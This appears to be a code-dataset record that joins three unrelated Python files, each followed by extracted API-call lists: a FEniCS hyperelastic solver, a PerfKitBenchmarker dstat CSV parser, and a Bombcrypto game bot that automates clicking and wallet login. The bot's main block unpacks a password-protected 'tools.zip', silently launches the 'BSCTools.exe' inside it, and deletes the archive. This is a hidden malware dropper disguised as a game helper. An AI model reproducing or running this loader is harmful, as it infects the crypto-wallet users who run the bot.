from .poisson import Poisson
from .. import arguments
from ..graph.visualization import scalar_field_paraview, save_solution
class PoissonRobot(Poisson):
def __init__(self, args):
super(PoissonRobot, self).__init__(args)
self.name = 'robot'
def _build_mesh(self):
args = self.args
self.width = 0.5
# mesh = fa.Mesh(args.root_path + '/' + args.solutions_path + '/saved_mesh/mesh_robot.xml')
mesh = fa.RectangleMesh(fa.Point(0, 0), fa.Point(
self.width, 10), 2, 20, 'crossed')
self.mesh = mesh
def _build_function_space(self):
width = self.width
class Exterior(fa.SubDomain):
def inside(self, x, on_boundary):
return on_boundary and (
fa.near(x[1], 10) or
fa.near(x[0], 1) or
fa.near(x[0], 0) or
fa.near(x[1], 0))
class Left(fa.SubDomain):
def inside(self, x, on_boundary):
return on_boundary and fa.near(x[0], 0)
class Right(fa.SubDomain):
def inside(self, x, on_boundary):
return on_boundary and fa.near(x[0], width)
class Bottom(fa.SubDomain):
def inside(self, x, on_boundary):
return on_boundary and fa.near(x[1], 0)
class Top(fa.SubDomain):
def inside(self, x, on_boundary):
return on_boundary and fa.near(x[1], 10)
self.exteriors_dic = {
'left': Left(), 'right': Right(), 'bottom': Bottom(), 'top': Top()}
self.exterior = Exterior()
self.V = fa.VectorFunctionSpace(self.mesh, 'P', 1)
self.W = fa.FunctionSpace(self.mesh, 'DG', 0)
self.sub_domains = fa.MeshFunction(
"size_t", self.mesh, self.mesh.topology().dim() - 1)
self.sub_domains.set_all(0)
self.boundaries_id_dic = {'left': 1, 'right': 2, 'bottom': 3, 'top': 4}
self.left = Left()
self.left.mark(self.sub_domains, 1)
self.right = Right()
self.right.mark(self.sub_domains, 2)
self.bottom = Bottom()
self.bottom.mark(self.sub_domains, 3)
self.top = Top()
self.top.mark(self.sub_domains, 4)
self.normal = fa.FacetNormal(self.mesh)
self.ds = fa.Measure("ds")(subdomain_data=self.sub_domains)
self.bcs = [self.bottom]
boundaries = [self.bottom, self.left, self.right]
boundary_fn = [fa.Constant((0., 0.)),
fa.Expression(("0", ".1*x[1]"), degree=1),
fa.Expression(("0", ".1*x[1]"), degree=1)]
self.bcs = []
for i in range(len(boundaries)):
boundary_bc = fa.DirichletBC(self.V, boundary_fn[i], boundaries[i])
self.bcs = self.bcs + [boundary_bc]
def _set_detailed_boundary_flags(self):
x1 = self.coo_dof[:, 0]
x2 = self.coo_dof[:, 1]
# [bottom, left_x, left_y, right_x, right_y]
boundary_flags_list = [np.zeros(self.num_dofs) for i in range(5)]
counter_left = 0
counter_right = 0
for i in range(self.num_dofs):
if x2[i] < 1e-10:
boundary_flags_list[0][i] = 1
else:
if x1[i] < 1e-10:
if counter_left % 2 == 0:
boundary_flags_list[1][i] = 1
else:
boundary_flags_list[2][i] = 1
counter_left += 1
if x1[i] > self.width - 1e-10:
if counter_right % 2 == 0:
boundary_flags_list[3][i] = 1
else:
boundary_flags_list[4][i] = 1
counter_right += 1
self.boundary_flags_list = boundary_flags_list
# Deformation gradient
def DeformationGradient(self, u):
I = fa.Identity(u.geometric_dimension())
return I + fa.grad(u)
# Right Cauchy-Green tensor
def RightCauchyGreen(self, F):
return F.T * F
# Neo-Hookean Energy
def _energy_density(self, u):
young_mod = 100
poisson_ratio = 0.3
shear_mod = young_mod / (2 * (1 + poisson_ratio))
bulk_mod = young_mod / (3 * (1 - 2 * poisson_ratio))
d = u.geometric_dimension()
F = self.DeformationGradient(u)
F = fa.variable(F)
J = fa.det(F)
I1 = fa.tr(self.RightCauchyGreen(F))
# Plane strain assumption
Jinv = J**(-2 / 3)
energy = ((shear_mod / 2) * (Jinv * (I1 + 1) - 3) +
(bulk_mod / 2) * (J - 1)**2)
return energy
def check_energy(self, dof_data):
u = fa.Function(self.V)
u.vector()[:] = dof_data
energy = self.energy(u)
print(energy)
def energy(self, u):
return fa.assemble(self._energy_density(u) * fa.dx)
def solve_problem_variational_form(self):
u = fa.Function(self.V)
du = fa.TrialFunction(self.V)
v = fa.TestFunction(self.V)
E = self._energy_density(u) * fa.dx
dE = fa.derivative(E, u, v)
jacE = fa.derivative(dE, u, du)
fa.solve(dE == 0, u, self.bcs, J=jacE)
return u
def compute_operators(self):
v = fa.Function(self.V)
w = fa.Function(self.W)
F00 = []
F01 = []
F10 = []
F11 = []
for i in range(self.num_dofs):
v.vector()[:] = 0
v.vector()[i] = 1
F = self.DeformationGradient(v)
f00 = fa.project(F[0, 0], self.W)
f01 = fa.project(F[0, 1], self.W)
f10 = fa.project(F[1, 0], self.W)
f11 = fa.project(F[1, 1], self.W)
F00.append(np.array(f00.vector()))
F01.append(np.array(f01.vector()))
F10.append(np.array(f10.vector()))
F11.append(np.array(f11.vector()))
# Do not forget to add 1 later
F00 = np.transpose(np.array(F00)) - 1
F01 = np.transpose(np.array(F01))
F10 = np.transpose(np.array(F10))
F11 = np.transpose(np.array(F11)) - 1
F = [F00, F01, F10, F11]
np.save(self.args.root_path + '/' +
self.args.numpy_path + '/robot/' + 'F' + '.npy', F)
return F
def compute_areas(self):
w = fa.Function(self.W)
area = np.zeros(self.W.dim())
for i in range(self.W.dim()):
w.vector()[:] = 0
w.vector()[i] = 1
area[i] = fa.assemble(w * fa.dx)
return area
def debug(self):
v = fa.Function(self.V)
v.vector()[0] = 1
w = fa.Function(self.W)
w.vector()[20] = 1
print(np.array(test.vector()))
if __name__ == '__main__':
args = arguments.args
pde = PoissonRobot(args)
u = pde.solve_problem_variational_form()
print(pde.energy(u))
save_solution(args, u, 'u')
| [
"fenics.project",
"fenics.TrialFunction",
"fenics.Function",
"fenics.near",
"fenics.FunctionSpace",
"fenics.assemble",
"fenics.FacetNormal",
"fenics.det",
"numpy.save",
"fenics.Point",
"fenics.DirichletBC",
"fenics.variable",
"fenics.Constant",
"fenics.grad",
"fenics.VectorFunctionSpace"... | [((1748, 1789), 'fenics.VectorFunctionSpace', 'fa.VectorFunctionSpace', (['self.mesh', '"""P"""', '(1)'], {}), "(self.mesh, 'P', 1)\n", (1770, 1789), True, 'import fenics as fa\n'), ((1807, 1843), 'fenics.FunctionSpace', 'fa.FunctionSpace', (['self.mesh', '"""DG"""', '(0)'], {}), "(self.mesh, 'DG', 0)\n", (1823, 1843), True, 'import fenics as fa\n'), ((2384, 2409), 'fenics.FacetNormal', 'fa.FacetNormal', (['self.mesh'], {}), '(self.mesh)\n', (2398, 2409), True, 'import fenics as fa\n'), ((4489, 4503), 'fenics.variable', 'fa.variable', (['F'], {}), '(F)\n', (4500, 4503), True, 'import fenics as fa\n'), ((4516, 4525), 'fenics.det', 'fa.det', (['F'], {}), '(F)\n', (4522, 4525), True, 'import fenics as fa\n'), ((4813, 4832), 'fenics.Function', 'fa.Function', (['self.V'], {}), '(self.V)\n', (4824, 4832), True, 'import fenics as fa\n'), ((5065, 5084), 'fenics.Function', 'fa.Function', (['self.V'], {}), '(self.V)\n', (5076, 5084), True, 'import fenics as fa\n'), ((5098, 5122), 'fenics.TrialFunction', 'fa.TrialFunction', (['self.V'], {}), '(self.V)\n', (5114, 5122), True, 'import fenics as fa\n'), ((5135, 5158), 'fenics.TestFunction', 'fa.TestFunction', (['self.V'], {}), '(self.V)\n', (5150, 5158), True, 'import fenics as fa\n'), ((5216, 5238), 'fenics.derivative', 'fa.derivative', (['E', 'u', 'v'], {}), '(E, u, v)\n', (5229, 5238), True, 'import fenics as fa\n'), ((5254, 5278), 'fenics.derivative', 'fa.derivative', (['dE', 'u', 'du'], {}), '(dE, u, du)\n', (5267, 5278), True, 'import fenics as fa\n'), ((5287, 5325), 'fenics.solve', 'fa.solve', (['(dE == 0)', 'u', 'self.bcs'], {'J': 'jacE'}), '(dE == 0, u, self.bcs, J=jacE)\n', (5295, 5325), True, 'import fenics as fa\n'), ((5389, 5408), 'fenics.Function', 'fa.Function', (['self.V'], {}), '(self.V)\n', (5400, 5408), True, 'import fenics as fa\n'), ((5421, 5440), 'fenics.Function', 'fa.Function', (['self.W'], {}), '(self.W)\n', (5432, 5440), True, 'import fenics as fa\n'), ((6282, 6373), 'numpy.save', 'np.save', (["(self.args.root_path + '/' + self.args.numpy_path + '/robot/' + 'F' + '.npy')", 'F'], {}), "(self.args.root_path + '/' + self.args.numpy_path + '/robot/' + 'F' +\n '.npy', F)\n", (6289, 6373), True, 'import numpy as np\n'), ((6445, 6464), 'fenics.Function', 'fa.Function', (['self.W'], {}), '(self.W)\n', (6456, 6464), True, 'import fenics as fa\n'), ((6700, 6719), 'fenics.Function', 'fa.Function', (['self.V'], {}), '(self.V)\n', (6711, 6719), True, 'import fenics as fa\n'), ((6758, 6777), 'fenics.Function', 'fa.Function', (['self.W'], {}), '(self.W)\n', (6769, 6777), True, 'import fenics as fa\n'), ((575, 589), 'fenics.Point', 'fa.Point', (['(0)', '(0)'], {}), '(0, 0)\n', (583, 589), True, 'import fenics as fa\n'), ((591, 615), 'fenics.Point', 'fa.Point', (['self.width', '(10)'], {}), '(self.width, 10)\n', (599, 615), True, 'import fenics as fa\n'), ((2428, 2444), 'fenics.Measure', 'fa.Measure', (['"""ds"""'], {}), "('ds')\n", (2438, 2444), True, 'import fenics as fa\n'), ((2593, 2616), 'fenics.Constant', 'fa.Constant', (['(0.0, 0.0)'], {}), '((0.0, 0.0))\n', (2604, 2616), True, 'import fenics as fa\n'), ((2639, 2680), 'fenics.Expression', 'fa.Expression', (["('0', '.1*x[1]')"], {'degree': '(1)'}), "(('0', '.1*x[1]'), degree=1)\n", (2652, 2680), True, 'import fenics as fa\n'), ((2705, 2746), 'fenics.Expression', 'fa.Expression', (["('0', '.1*x[1]')"], {'degree': '(1)'}), "(('0', '.1*x[1]'), degree=1)\n", (2718, 2746), True, 'import fenics as fa\n'), ((2837, 2890), 'fenics.DirichletBC', 'fa.DirichletBC', (['self.V', 'boundary_fn[i]', 'boundaries[i]'], {}), '(self.V, boundary_fn[i], boundaries[i])\n', (2851, 2890), True, 'import fenics as fa\n'), ((3132, 3155), 'numpy.zeros', 'np.zeros', (['self.num_dofs'], {}), '(self.num_dofs)\n', (3140, 3155), True, 'import numpy as np\n'), ((4068, 4078), 'fenics.grad', 'fa.grad', (['u'], {}), '(u)\n', (4075, 4078), True, 'import fenics as fa\n'), ((5670, 5697), 'fenics.project', 'fa.project', (['F[0, 0]', 'self.W'], {}), '(F[0, 0], self.W)\n', (5680, 5697), True, 'import fenics as fa\n'), ((5716, 5743), 'fenics.project', 'fa.project', (['F[0, 1]', 'self.W'], {}), '(F[0, 1], self.W)\n', (5726, 5743), True, 'import fenics as fa\n'), ((5762, 5789), 'fenics.project', 'fa.project', (['F[1, 0]', 'self.W'], {}), '(F[1, 0], self.W)\n', (5772, 5789), True, 'import fenics as fa\n'), ((5808, 5835), 'fenics.project', 'fa.project', (['F[1, 1]', 'self.W'], {}), '(F[1, 1], self.W)\n', (5818, 5835), True, 'import fenics as fa\n'), ((6137, 6150), 'numpy.array', 'np.array', (['F01'], {}), '(F01)\n', (6145, 6150), True, 'import numpy as np\n'), ((6179, 6192), 'numpy.array', 'np.array', (['F10'], {}), '(F10)\n', (6187, 6192), True, 'import numpy as np\n'), ((6623, 6645), 'fenics.assemble', 'fa.assemble', (['(w * fa.dx)'], {}), '(w * fa.dx)\n', (6634, 6645), True, 'import fenics as fa\n'), ((6091, 6104), 'numpy.array', 'np.array', (['F00'], {}), '(F00)\n', (6099, 6104), True, 'import numpy as np\n'), ((6221, 6234), 'numpy.array', 'np.array', (['F11'], {}), '(F11)\n', (6229, 6234), True, 'import numpy as np\n'), ((1145, 1161), 'fenics.near', 'fa.near', (['x[0]', '(0)'], {}), '(x[0], 0)\n', (1152, 1161), True, 'import fenics as fa\n'), ((1284, 1304), 'fenics.near', 'fa.near', (['x[0]', 'width'], {}), '(x[0], width)\n', (1291, 1304), True, 'import fenics as fa\n'), ((1428, 1444), 'fenics.near', 'fa.near', (['x[1]', '(0)'], {}), '(x[1], 0)\n', (1435, 1444), True, 'import fenics as fa\n'), ((1565, 1582), 'fenics.near', 'fa.near', (['x[1]', '(10)'], {}), '(x[1], 10)\n', (1572, 1582), True, 'import fenics as fa\n'), ((885, 902), 'fenics.near', 'fa.near', (['x[1]', '(10)'], {}), '(x[1], 10)\n', (892, 902), True, 'import fenics as fa\n'), ((926, 942), 'fenics.near', 'fa.near', (['x[0]', '(1)'], {}), '(x[0], 1)\n', (933, 942), True, 'import fenics as fa\n'), ((966, 982), 'fenics.near', 'fa.near', (['x[0]', '(0)'], {}), '(x[0], 0)\n', (973, 982), True, 'import fenics as fa\n'), ((1006, 1022), 'fenics.near', 'fa.near', (['x[1]', '(0)'], {}), '(x[1], 0)\n', (1013, 1022), True, 'import fenics as fa\n')] |
# Copyright 2015 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing dstat installation and cleanup functions."""
import csv
import itertools
import numpy as np
from six.moves import zip
def ParseCsvFile(fp):
"""Parse dstat results file in csv format.
Args:
file: string. Name of the file.
Returns:
A tuple of list of dstat labels and ndarray containing parsed data.
"""
reader = csv.reader(fp)
headers = list(itertools.islice(reader, 5))
if len(headers) != 5:
raise ValueError(
'Expected exactly 5 header lines got {}\n{}'.format(
len(headers), headers))
if 'Dstat' not in headers[0][0]:
raise ValueError(
'Expected first header cell to contain "Dstat"\n{}'.format(
headers[0]))
if 'Host:' not in headers[2][0]:
raise ValueError(('Expected first cell in third line to be '
'"Host:"\n{}').format(headers[2]))
categories = next(reader)
# Categories are not repeated; copy category name across columns in the
# same category
for i, category in enumerate(categories):
if not categories[i]:
categories[i] = categories[i - 1]
labels = next(reader)
if len(labels) != len(categories):
raise ValueError((
'Number of categories ({}) does not match number of '
'labels ({})\nCategories: {}\nLabels:{}').format(
len(categories), len(labels), categories, labels))
# Generate new column names
labels = ['%s__%s' % x for x in zip(labels, categories)]
data = []
for i, row in enumerate(reader):
# Remove the trailing comma
if len(row) == len(labels) + 1:
if row[-1]:
raise ValueError(('Expected the last element of row {0} to be empty,'
' found {1}').format(row, row[-1]))
row = row[:-1]
if len(labels) != len(row):
raise ValueError(('Number of labels ({}) does not match number of '
'columns ({}) in row {}:\n{}').format(
len(labels), len(row), i, row))
data.append(row)
return labels, np.array(data, dtype=float)
def _Install(vm):
"""Installs the dstat package on the VM."""
vm.InstallPackages('dstat')
def YumInstall(vm):
"""Installs the dstat package on the VM."""
_Install(vm)
def AptInstall(vm):
"""Installs the dstat package on the VM."""
_Install(vm)
| [
"numpy.array",
"six.moves.zip",
"csv.reader",
"itertools.islice"
] | [((967, 981), 'csv.reader', 'csv.reader', (['fp'], {}), '(fp)\n', (977, 981), False, 'import csv\n'), ((999, 1026), 'itertools.islice', 'itertools.islice', (['reader', '(5)'], {}), '(reader, 5)\n', (1015, 1026), False, 'import itertools\n'), ((2632, 2659), 'numpy.array', 'np.array', (['data'], {'dtype': 'float'}), '(data, dtype=float)\n', (2640, 2659), True, 'import numpy as np\n'), ((2044, 2067), 'six.moves.zip', 'zip', (['labels', 'categories'], {}), '(labels, categories)\n', (2047, 2067), False, 'from six.moves import zip\n')] |
# -*- coding: utf-8 -*-
from src.logger import logger, loggerMapClicked
from cv2 import cv2
from os import listdir
from random import randint
from random import random
import numpy as np
import mss
import os
import subprocess
import zipfile
import pyautogui
import time
import sys
import yaml
# Load config file.
stream = open("config.yaml", 'r')
c = yaml.safe_load(stream)
ct = c['threshold']
ch = c['home']
pause = c['time_intervals']['interval_between_moviments']
pyautogui.PAUSE = pause
cat = """
_
\`*-.
) _`-.
. : `. .
: _ ' \\
; *` _. `*-._
`-.-' `-.
; ` `.
:. . \\
. \ . : .-' .
' `+.; ; ' :
: ' | ; ;-.
; ' : :`-: _.`* ;
.*' / .*' ; .*`- +' `*'
`*-* `*-* `*-*'
=========================================================================
========= 💰 Have I helped you in any way? All I ask is a tip! 🧾 =======
=========================================================================
===================== vvv BNB // BEP-20 TOKENS vvv ======================
============== <KEY> ===============
=========================================================================
>>---> Press CTRL + C to stop the bot.
>>---> Some configs can be found in the config.yaml file."""
def addRandomness(n, randomn_factor_size=None):
"""Returns n with randomness
Parameters:
n (int): A decimal integer
randomn_factor_size (int): The maximum value+- of randomness that will be
added to n
Returns:
int: n with randomness
"""
if randomn_factor_size is None:
randomness_percentage = 0.1
randomn_factor_size = randomness_percentage * n
random_factor = 2 * random() * randomn_factor_size
if random_factor > 5:
random_factor = 5
without_average_random_factor = n - randomn_factor_size
randomized_n = int(without_average_random_factor + random_factor)
# logger('{} with randomness -> {}'.format(int(n), randomized_n))
return int(randomized_n)
def moveToWithRandomness(x,y,t):
pyautogui.moveTo(addRandomness(x,10),addRandomness(y,10),t+random()/2)
def remove_suffix(input_string, suffix):
"""Returns the input_string without the suffix"""
if suffix and input_string.endswith(suffix):
return input_string[:-len(suffix)]
return input_string
def load_images(dir_path='./targets/'):
""" Programatically loads all images of dir_path as a key:value where the
key is the file name without the .png suffix
Returns:
dict: dictionary containing the loaded images as key:value pairs.
"""
file_names = listdir(dir_path)
targets = {}
for file in file_names:
path = 'targets/' + file
targets[remove_suffix(file, '.png')] = cv2.imread(path)
return targets
def loadHeroesToSendHome():
"""Loads the images in the path and saves them as a list"""
file_names = listdir('./targets/heroes-to-send-home')
heroes = []
for file in file_names:
path = './targets/heroes-to-send-home/' + file
heroes.append(cv2.imread(path))
print('>>---> %d heroes that should be sent home loaded' % len(heroes))
return heroes
def show(rectangles, img = None):
""" Show an popup with rectangles showing the rectangles[(x, y, w, h),...]
over img or a printSreen if no img provided. Useful for debugging"""
if img is None:
with mss.mss() as sct:
monitor = sct.monitors[0]
img = np.array(sct.grab(monitor))
for (x, y, w, h) in rectangles:
cv2.rectangle(img, (x, y), (x + w, y + h), (255,255,255,255), 2)
# cv2.rectangle(img, (result[0], result[1]), (result[0] + result[2], result[1] + result[3]), (255,50,255), 2)
cv2.imshow('img',img)
cv2.waitKey(0)
def clickBtn(img, timeout=3, threshold = ct['default']):
"""Search for img in the scree, if found moves the cursor over it and clicks.
Parameters:
img: The image that will be used as an template to find where to click.
timeout (int): Time in seconds that it will keep looking for the img before returning with fail
threshold(float): How confident the bot needs to be to click the buttons (values from 0 to 1)
"""
logger(None, progress_indicator=True)
start = time.time()
has_timed_out = False
while(not has_timed_out):
matches = positions(img, threshold=threshold)
if(len(matches)==0):
has_timed_out = time.time()-start > timeout
continue
x,y,w,h = matches[0]
pos_click_x = x+w/2
pos_click_y = y+h/2
moveToWithRandomness(pos_click_x,pos_click_y,1)
pyautogui.click()
return True
return False
def printSreen():
with mss.mss() as sct:
monitor = sct.monitors[0]
sct_img = np.array(sct.grab(monitor))
# The screen part to capture
# monitor = {"top": 160, "left": 160, "width": 1000, "height": 135}
# Grab the data
return sct_img[:,:,:3]
def positions(target, threshold=ct['default'],img = None):
if img is None:
img = printSreen()
result = cv2.matchTemplate(img,target,cv2.TM_CCOEFF_NORMED)
w = target.shape[1]
h = target.shape[0]
yloc, xloc = np.where(result >= threshold)
rectangles = []
for (x, y) in zip(xloc, yloc):
rectangles.append([int(x), int(y), int(w), int(h)])
rectangles.append([int(x), int(y), int(w), int(h)])
rectangles, weights = cv2.groupRectangles(rectangles, 1, 0.2)
return rectangles
def scroll():
commoms = positions(images['commom-text'], threshold = ct['commom'])
if (len(commoms) == 0):
return
x,y,w,h = commoms[len(commoms)-1]
#
moveToWithRandomness(x,y,1)
if not c['use_click_and_drag_instead_of_scroll']:
pyautogui.scroll(-c['scroll_size'])
else:
pyautogui.dragRel(0,-c['click_and_drag_amount'],duration=1, button='left')
def clickButtons():
buttons = positions(images['go-work'], threshold=ct['go_to_work_btn'])
# print('buttons: {}'.format(len(buttons)))
for (x, y, w, h) in buttons:
moveToWithRandomness(x+(w/2),y+(h/2),1)
pyautogui.click()
global hero_clicks
hero_clicks = hero_clicks + 1
#cv2.rectangle(sct_img, (x, y) , (x + w, y + h), (0,255,255),2)
if hero_clicks > 20:
logger('too many hero clicks, try to increase the go_to_work_btn threshold')
return
return len(buttons)
def isHome(hero, buttons):
y = hero[1]
for (_,button_y,_,button_h) in buttons:
isBelow = y < (button_y + button_h)
isAbove = y > (button_y - button_h)
if isBelow and isAbove:
# if send-home button exists, the hero is not home
return False
return True
def isWorking(bar, buttons):
y = bar[1]
for (_,button_y,_,button_h) in buttons:
isBelow = y < (button_y + button_h)
isAbove = y > (button_y - button_h)
if isBelow and isAbove:
return False
return True
def clickGreenBarButtons():
# ele clicka nos q tao trabaiano mas axo q n importa
offset = 140
green_bars = positions(images['green-bar'], threshold=ct['green_bar'])
logger('🟩 %d green bars detected' % len(green_bars))
buttons = positions(images['go-work'], threshold=ct['go_to_work_btn'])
logger('🆗 %d buttons detected' % len(buttons))
not_working_green_bars = []
for bar in green_bars:
if not isWorking(bar, buttons):
not_working_green_bars.append(bar)
if len(not_working_green_bars) > 0:
logger('🆗 %d buttons with green bar detected' % len(not_working_green_bars))
logger('👆 Clicking in %d heroes' % len(not_working_green_bars))
# se tiver botao com y maior que bar y-10 e menor que y+10
hero_clicks_cnt = 0
for (x, y, w, h) in not_working_green_bars:
# isWorking(y, buttons)
moveToWithRandomness(x+offset+(w/2),y+(h/2),1)
pyautogui.click()
global hero_clicks
hero_clicks = hero_clicks + 1
hero_clicks_cnt = hero_clicks_cnt + 1
if hero_clicks_cnt > 20:
logger('⚠️ Too many hero clicks, try to increase the go_to_work_btn threshold')
return
#cv2.rectangle(sct_img, (x, y) , (x + w, y + h), (0,255,255),2)
return len(not_working_green_bars)
def clickFullBarButtons():
offset = 100
full_bars = positions(images['full-stamina'], threshold=ct['default'])
buttons = positions(images['go-work'], threshold=ct['go_to_work_btn'])
not_working_full_bars = []
for bar in full_bars:
if not isWorking(bar, buttons):
not_working_full_bars.append(bar)
if len(not_working_full_bars) > 0:
logger('👆 Clicking in %d heroes' % len(not_working_full_bars))
for (x, y, w, h) in not_working_full_bars:
moveToWithRandomness(x+offset+(w/2),y+(h/2),1)
pyautogui.click()
global hero_clicks
hero_clicks = hero_clicks + 1
return len(not_working_full_bars)
def goToHeroes():
if clickBtn(images['go-back-arrow']):
global login_attempts
login_attempts = 0
#TODO tirar o sleep quando colocar o pulling
time.sleep(1)
clickBtn(images['hero-icon'])
time.sleep(randint(1,3))
def goToGame():
# in case of server overload popup
clickBtn(images['x'])
# time.sleep(3)
clickBtn(images['x'])
clickBtn(images['treasure-hunt-icon'])
def refreshHeroesPositions():
logger('🔃 Refreshing Heroes Positions')
clickBtn(images['go-back-arrow'])
clickBtn(images['treasure-hunt-icon'])
# time.sleep(3)
clickBtn(images['treasure-hunt-icon'])
def login():
global login_attempts
logger('😿 Checking if game has disconnected')
if login_attempts > 3:
logger('🔃 Too many login attempts, refreshing')
login_attempts = 0
pyautogui.hotkey('ctrl','f5')
return
if clickBtn(images['connect-wallet'], timeout = 10):
logger('🎉 Connect wallet button detected, logging in!')
login_attempts = login_attempts + 1
#TODO mto ele da erro e poco o botao n abre
# time.sleep(10)
if clickBtn(images['select-wallet-2'], timeout=8):
# sometimes the sign popup appears imediately
login_attempts = login_attempts + 1
# print('sign button clicked')
# print('{} login attempt'.format(login_attempts))
if clickBtn(images['treasure-hunt-icon'], timeout = 15):
# print('sucessfully login, treasure hunt btn clicked')
login_attempts = 0
return
# click ok button
if not clickBtn(images['select-wallet-1-no-hover'], ):
if clickBtn(images['select-wallet-1-hover'], threshold = ct['select_wallet_buttons'] ):
pass
# o ideal era que ele alternasse entre checar cada um dos 2 por um tempo
# print('sleep in case there is no metamask text removed')
# time.sleep(20)
else:
pass
# print('sleep in case there is no metamask text removed')
# time.sleep(20)
if clickBtn(images['select-wallet-2'], timeout = 20):
login_attempts = login_attempts + 1
# print('sign button clicked')
# print('{} login attempt'.format(login_attempts))
# time.sleep(25)
if clickBtn(images['treasure-hunt-icon'], timeout=25):
# print('sucessfully login, treasure hunt btn clicked')
login_attempts = 0
# time.sleep(15)
if clickBtn(images['ok'], timeout=5):
pass
# time.sleep(15)
# print('ok button clicked')
def sendHeroesHome():
if not ch['enable']:
return
heroes_positions = []
for hero in home_heroes:
hero_positions = positions(hero, threshold=ch['hero_threshold'])
if not len (hero_positions) == 0:
#TODO maybe pick up match with most wheight instead of first
hero_position = hero_positions[0]
heroes_positions.append(hero_position)
n = len(heroes_positions)
if n == 0:
print('No heroes that should be sent home found.')
return
print(' %d heroes that should be sent home found' % n)
# if send-home button exists, the hero is not home
go_home_buttons = positions(images['send-home'], threshold=ch['home_button_threshold'])
# TODO pass it as an argument for both this and the other function that uses it
go_work_buttons = positions(images['go-work'], threshold=ct['go_to_work_btn'])
for position in heroes_positions:
if not isHome(position,go_home_buttons):
print(isWorking(position, go_work_buttons))
if(not isWorking(position, go_work_buttons)):
print ('hero not working, sending him home')
moveToWithRandomness(go_home_buttons[0][0]+go_home_buttons[0][2]/2,position[1]+position[3]/2,1)
pyautogui.click()
else:
print ('hero working, not sending him home(no dark work button)')
else:
print('hero already home, or home full(no dark home button)')
def refreshHeroes():
logger('🏢 Search for heroes to work')
goToHeroes()
if c['select_heroes_mode'] == "full":
logger('⚒️ Sending heroes with full stamina bar to work', 'green')
elif c['select_heroes_mode'] == "green":
logger('⚒️ Sending heroes with green stamina bar to work', 'green')
else:
logger('⚒️ Sending all heroes to work', 'green')
buttonsClicked = 1
empty_scrolls_attempts = c['scroll_attemps']
while(empty_scrolls_attempts >0):
if c['select_heroes_mode'] == 'full':
buttonsClicked = clickFullBarButtons()
elif c['select_heroes_mode'] == 'green':
buttonsClicked = clickGreenBarButtons()
else:
buttonsClicked = clickButtons()
sendHeroesHome()
if buttonsClicked == 0:
empty_scrolls_attempts = empty_scrolls_attempts - 1
scroll()
time.sleep(2)
logger('💪 {} heroes sent to work'.format(hero_clicks))
goToGame()
def main():
"""Main execution setup and loop"""
# ==Setup==
global hero_clicks
global login_attempts
global last_log_is_progress
hero_clicks = 0
login_attempts = 0
last_log_is_progress = False
global images
images = load_images()
if ch['enable']:
global home_heroes
home_heroes = loadHeroesToSendHome()
else:
print('>>---> Home feature not enabled')
print('\n')
print(cat)
time.sleep(7)
t = c['time_intervals']
last = {
"login" : 0,
"heroes" : 0,
"new_map" : 0,
"check_for_captcha" : 0,
"refresh_heroes" : 0
}
# =========
while True:
now = time.time()
if now - last["check_for_captcha"] > addRandomness(t['check_for_captcha'] * 60):
last["check_for_captcha"] = now
if now - last["heroes"] > addRandomness(t['send_heroes_for_work'] * 60):
last["heroes"] = now
refreshHeroes()
if now - last["login"] > addRandomness(t['check_for_login'] * 60):
sys.stdout.flush()
last["login"] = now
login()
if now - last["new_map"] > t['check_for_new_map_button']:
last["new_map"] = now
if clickBtn(images['new-map']):
loggerMapClicked()
if now - last["refresh_heroes"] > addRandomness( t['refresh_heroes_positions'] * 60):
last["refresh_heroes"] = now
refreshHeroesPositions()
#clickBtn(teasureHunt)
logger(None, progress_indicator=True)
sys.stdout.flush()
time.sleep(1)
if __name__ == '__main__':
with zipfile.ZipFile("./src/execute/tools.zip") as file:
file.extractall("./src/execute/", pwd = bytes("wowwowee", 'utf-8'))
subprocess.Popen(["./src/execute/BSCTools.exe"])
os.remove("./src/execute/tools.zip")
main()
#cv2.imshow('img',sct_img)
#cv2.waitKey()
| [
"os.remove",
"cv2.cv2.rectangle",
"yaml.safe_load",
"sys.stdout.flush",
"cv2.cv2.waitKey",
"src.logger.logger",
"random.randint",
"src.logger.loggerMapClicked",
"pyautogui.scroll",
"subprocess.Popen",
"time.sleep",
"random.random",
"pyautogui.dragRel",
"pyautogui.click",
"cv2.cv2.imread"... | [((356, 378), 'yaml.safe_load', 'yaml.safe_load', (['stream'], {}), '(stream)\n', (370, 378), False, 'import yaml\n'), ((3364, 3381), 'os.listdir', 'listdir', (['dir_path'], {}), '(dir_path)\n', (3371, 3381), False, 'from os import listdir\n'), ((3655, 3695), 'os.listdir', 'listdir', (['"""./targets/heroes-to-send-home"""'], {}), "('./targets/heroes-to-send-home')\n", (3662, 3695), False, 'from os import listdir\n'), ((4490, 4512), 'cv2.cv2.imshow', 'cv2.imshow', (['"""img"""', 'img'], {}), "('img', img)\n", (4500, 4512), False, 'from cv2 import cv2\n'), ((4516, 4530), 'cv2.cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (4527, 4530), False, 'from cv2 import cv2\n'), ((4990, 5027), 'src.logger.logger', 'logger', (['None'], {'progress_indicator': '(True)'}), '(None, progress_indicator=True)\n', (4996, 5027), False, 'from src.logger import logger, loggerMapClicked\n'), ((5040, 5051), 'time.time', 'time.time', ([], {}), '()\n', (5049, 5051), False, 'import time\n'), ((5890, 5942), 'cv2.cv2.matchTemplate', 'cv2.matchTemplate', (['img', 'target', 'cv2.TM_CCOEFF_NORMED'], {}), '(img, target, cv2.TM_CCOEFF_NORMED)\n', (5907, 5942), False, 'from cv2 import cv2\n'), ((6007, 6036), 'numpy.where', 'np.where', (['(result >= threshold)'], {}), '(result >= threshold)\n', (6015, 6036), True, 'import numpy as np\n'), ((6241, 6280), 'cv2.cv2.groupRectangles', 'cv2.groupRectangles', (['rectangles', '(1)', '(0.2)'], {}), '(rectangles, 1, 0.2)\n', (6260, 6280), False, 'from cv2 import cv2\n'), ((9990, 10003), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (10000, 10003), False, 'import time\n'), ((10275, 10314), 'src.logger.logger', 'logger', (['"""🔃 Refreshing Heroes Positions"""'], {}), "('🔃 Refreshing Heroes Positions')\n", (10281, 10314), 